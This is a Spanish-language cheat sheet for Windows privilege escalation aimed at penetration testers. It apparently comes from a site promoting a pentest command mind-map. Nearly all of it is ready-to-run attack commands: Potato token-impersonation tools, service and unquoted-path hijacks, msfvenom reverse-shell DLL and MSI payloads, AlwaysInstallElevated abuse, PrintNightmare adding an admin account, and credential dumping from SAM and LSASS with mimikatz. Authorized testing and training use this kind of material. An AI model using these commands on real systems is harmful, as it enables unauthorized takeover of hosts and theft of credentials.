Escalada de Privilegios Windows — Cheatsheet 2026

70+ técnicas para pasar de un usuario con pocos privilegios a NT AUTHORITY\SYSTEM. Enumeración, suplantación de token (Potato), servicios mal configurados, rutas sin comillas, AlwaysInstallElevated, DLL hijacking y exploits de kernel.

Última actualización:

¿Principiante? Lee nuestra guía completa para empezar y sitúa la escalada de privilegios en la metodología.

Navegación rápida

01 Enumeración 02 Privilegios de token 03 Ataques Potato 04 Servicios mal configurados 05 Rutas sin comillas 06 Registro & AutoRuns 07 AlwaysInstallElevated 08 Búsqueda de credenciales 09 Kernel & PrintNightmare 10 Herramientas automatizadas

# Enumeración inicial

Conoce tu contexto antes de tocar un exploit: quién eres, tus privilegios, el nivel de parches y qué hay instalado.

whoami /priv
Listar los privilegios de tu token — busca SeImpersonate, SeBackup, SeDebug
whoami /groups
Pertenencia a grupos — ¿estás en un grupo privilegiado?
systeminfo
Versión del SO, arquitectura y parches instalados (para exploits de kernel)
net user; net localgroup administrators
Usuarios locales y quién es administrador local
wmic qfe get HotFixID,InstalledOn
Historial de parches — para Windows Exploit Suggester
netstat -ano
Puertos internos en escucha — servicios ligados solo a localhost

# Privilegios de token peligrosos

Ciertos privilegios son una vía directa a SYSTEM. Enumera con whoami /priv y contrasta con esta tabla.

PrivilegioExplotación
SeImpersonateAtaques Potato (PrintSpoofer, GodPotato)
SeAssignPrimaryTokenAtaques Potato
SeBackupLeer las ruches SAM/SYSTEM → volcar hashes
SeRestoreSobrescribir cualquier archivo protegido
SeDebugInyectar en un proceso SYSTEM
SeTakeOwnershipTomar posesión de cualquier objeto
reg save HKLM\SAM sam.hive && reg save HKLM\SYSTEM system.hive
Con SeBackup — guardar las ruches y extraer hashes offline con secretsdump

# Ataques Potato (SeImpersonate)

Las cuentas de servicio (IIS, MSSQL) suelen tener SeImpersonatePrivilege. La familia Potato abusa de ello para convertirse en SYSTEM.

PrintSpoofer.exe -i -c cmd
PrintSpoofer — shell SYSTEM fiable en Windows 10/Server 2016-2019
GodPotato.exe -cmd "cmd /c whoami"
GodPotato — funciona en Windows moderno incluido Server 2022
JuicyPotatoNG.exe -t * -p C:\Windows\System32\cmd.exe
JuicyPotatoNG — Potato actualizado para builds recientes
💡 Consejo: ¿caíste como iis apppool\defaultapppool o cuenta de servicio MSSQL? Revisa whoami /priv — SeImpersonate casi siempre está.

# Servicios mal configurados

Permisos de servicio débiles permiten reemplazar el binario o reconfigurar el servicio para ejecutar tu payload como SYSTEM.

accesschk.exe -uwcqv "Users" *
Encontrar servicios modificables por tu usuario (SERVICE_CHANGE_CONFIG)
sc qc SERVICE_NAME
Consultar la ruta binaria y la configuración de inicio de un servicio
sc config SERVICE_NAME binpath= "C:\temp\rev.exe"
Reconfigurar un servicio débil para ejecutar tu payload
sc stop SERVICE_NAME && sc start SERVICE_NAME
Reiniciar el servicio para disparar tu payload como SYSTEM
icacls "C:\Path\To\service.exe"
Comprobar si el binario del servicio es escribible (basta reemplazarlo)

# Rutas de servicio sin comillas

Una ruta de servicio con espacios y sin comillas permite a Windows ejecutar una ruta parcial anterior — deja ahí tu binario.

wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """
Encontrar servicios con rutas sin comillas que contienen espacios
icacls "C:\Program Files\Some Folder\"
Comprobar acceso de escritura a un directorio anterior de la ruta
copy rev.exe "C:\Program Files\Some.exe"
Colocar tu binario para que Windows lo ejecute en lugar del servicio real

# Registro, AutoRuns & DLL Hijacking

Claves de autorun escribibles y fallos en el orden de búsqueda de DLL permiten ejecutar tu código con mayor privilegio.

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Listar programas en autorun — ¿algún binario escribible?
accesschk.exe -wvu "HKLM\...\Run"
Comprobar acceso de escritura a las claves de registro de autorun
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f dll -o hijack.dll
Crear una DLL maliciosa para una ruta de búsqueda secuestrable

# AlwaysInstallElevated

Si esta política está habilitada, cualquier usuario puede instalar un MSI como SYSTEM — victoria inmediata.

reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Comprobar la clave HKLM (debe valer 1)
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Comprobar la clave HKCU (también debe valer 1)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f msi -o evil.msi
Crear un paquete MSI malicioso
msiexec /quiet /qn /i evil.msi
Instalarlo — se ejecuta como SYSTEM cuando la política está activa

# Búsqueda de credenciales

Windows guarda contraseñas en más sitios de los que crees — archivos, registro y memoria.

reg query HKLM /f password /t REG_SZ /s
Buscar contraseñas almacenadas en el registro
findstr /si password *.txt *.ini *.config *.xml
Buscar credenciales hardcodeadas en archivos
dir /s /b C:\Users\*unattend.xml C:\Windows\Panther\*
Los archivos de instalación desatendida suelen contener la contraseña de admin local
cmdkey /list
Credenciales almacenadas — reutilizables con runas /savecred
mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
Volcar contraseñas en claro y hashes NTLM de LSASS (requiere SYSTEM)

# Exploits de kernel & PrintNightmare

Usa los exploits de kernel como último recurso — haz coincidir el build exacto de systeminfo.

ExploitCVEObjetivo
PrintNightmareCVE-2021-1675 / 34527Servicio Spooler (la mayoría de Windows)
HiveNightmareCVE-2021-36934SAM legible (Win10/11)
CVE-2021-40449CallbackTableWin7 – Server 2019
CVE-2020-0787 (BITS)Movimiento arbitrario de archivoWin7 – Win10
python windows-exploit-suggester.py --database db.xls --systeminfo sysinfo.txt
Asociar los parches faltantes con exploits de kernel públicos
Invoke-Nightmare -NewUser hacker -NewPassword Pass123!
PrintNightmare — añadir un admin local vía el servicio Spooler

# Herramientas de enumeración automatizadas

Automatiza las comprobaciones — pero valida cada hallazgo antes de explotarlo.

.\winPEASx64.exe
WinPEAS — el enumerador privesc coloreado estándar
powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"
PowerUp — comprobaciones privesc en PowerShell
.\Seatbelt.exe -group=all
Seatbelt — inventario de ajustes de seguridad del host
.\SharpUp.exe audit
SharpUp — port en C# de las comprobaciones de PowerUp

❓ FAQ escalada de privilegios Windows

Por la enumeración. Ejecuta whoami /priv y whoami /groups, luego systeminfo para el nivel de parches. WinPEAS ayuda, pero el examen OSCP premia dominar las comprobaciones manuales.

Si tienes SeImpersonatePrivilege (común en cuentas IIS/MSSQL), la familia Potato (PrintSpoofer, GodPotato) abusa de ello para suplantar el token SYSTEM y ejecutarse como NT AUTHORITY\SYSTEM.

Cuando una ruta de servicio tiene espacios y sin comillas, Windows prueba cada ruta parcial. Si puedes escribir en un directorio anterior, tu binario se ejecuta con los privilegios del servicio al iniciarse.

Una política que permite a cualquier usuario instalar MSI como SYSTEM. Si las claves HKLM y HKCU valen 1, crea un MSI malicioso con msfvenom y ejecuta msiexec /quiet /i evil.msi para una shell SYSTEM.

WinPEAS es la herramienta estándar. Alternativas: PowerUp (PowerShell), Seatbelt y Windows Exploit Suggester para parches faltantes. Valida siempre manualmente antes de explotar.

SeImpersonate/SeAssignPrimaryToken (Potato), SeBackup (leer SAM), SeRestore, SeDebug y SeTakeOwnership. Comprueba con whoami /priv.

Con SYSTEM, vuelca SAM/LSA con reg save o mimikatz sekurlsa::logonpasswords. También puedes volcar LSASS con procdump/comsvcs.dll y analizarlo offline con pypykatz.

Abusar del orden de búsqueda de DLL: si un programa privilegiado carga una DLL por nombre y puedes escribir en un directorio buscado primero, tu DLL se carga y ejecuta con los privilegios del programa.

📚 Recursos relacionados

Informe de pentest asistido por IA

Convierte tu compromiso SYSTEM en un informe PDF profesional. La IA rellena CVE, CVSS y severidad.

Probar gratis →

¿Quieres los 12 020+ comandos?

Esta cheatsheet de privesc Windows es solo una rama del mapa. Pentest Mindmap organiza 12 020+ comandos en 34 categorías — de recon a post-explotación — con búsqueda instantánea y copia en un clic.

Empezar gratis →